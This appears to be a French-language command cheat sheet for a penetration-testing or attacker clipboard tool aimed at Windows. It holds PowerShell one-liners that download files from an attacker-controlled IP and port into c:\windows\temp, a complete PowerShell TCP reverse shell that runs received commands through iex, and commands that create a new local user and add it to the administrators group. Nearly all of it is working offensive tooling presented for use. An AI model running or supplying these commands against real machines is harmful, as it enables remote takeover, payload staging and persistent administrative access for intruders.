% download, windows, powershell

# Télécharger le fichier depuis un serveur web
echo powershell -c "Invoke-WebRequest -Uri 'http://<IP>:<PORT>/<FILE>' -OutFile '<DIRECTORY_OUT>\<FILE>'" | xclip -selection clipboard -f | cat

# Télécharger le fichier depuis un serveur web
echo powershell "(New-Object System.Net.WebClient).Downloadfile('http://<IP>:<PORT>/<FILE>')" | xclip -selection clipboard -f | cat

$ IP: ip -4 addr | grep -oP '(?<=inet\s)\d+(\.\d+){3}'
$ PORT: echo "21,22,80,443,1234,4444" | tr ',' '\n'
$ FILE: echo "file.sh,file.exe,file.php,file.bat" | tr ',' '\n'
$ DIRECTORY_OUT: echo "c:\windows\temp," | tr ',' '\n'


% windows, service

# Gérer les services windows
echo sc <ETAT> <SERVICE> | xclip -selection clipboard -f | cat

# Afficher les services en cours
echo powershell -c "Get-Service" | xclip -selection clipboard -f | cat

$ ETAT: echo "start,stop,query" | tr ',' '\n'

% windows, processus

# Démarrer un processus
echo Start-Process <PROCESSUS> | xclip -selection clipboard -f | cat


% windows, reverse, shell

# Reverse shell powershell
echo -n powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" | xclip -selection clipboard -f | cat


% windows, add, user, group

# Ajouter un nouvel utilisateur à windows
echo -n net user <USERNAME> <PASSWORD> /add | xclip -selection clipboard -f | cat

# Ajouter l'utilisateur au groupe admin
echo -n net localgroup administrators <USERNAME> /add | xclip -selection clipboard -f | cat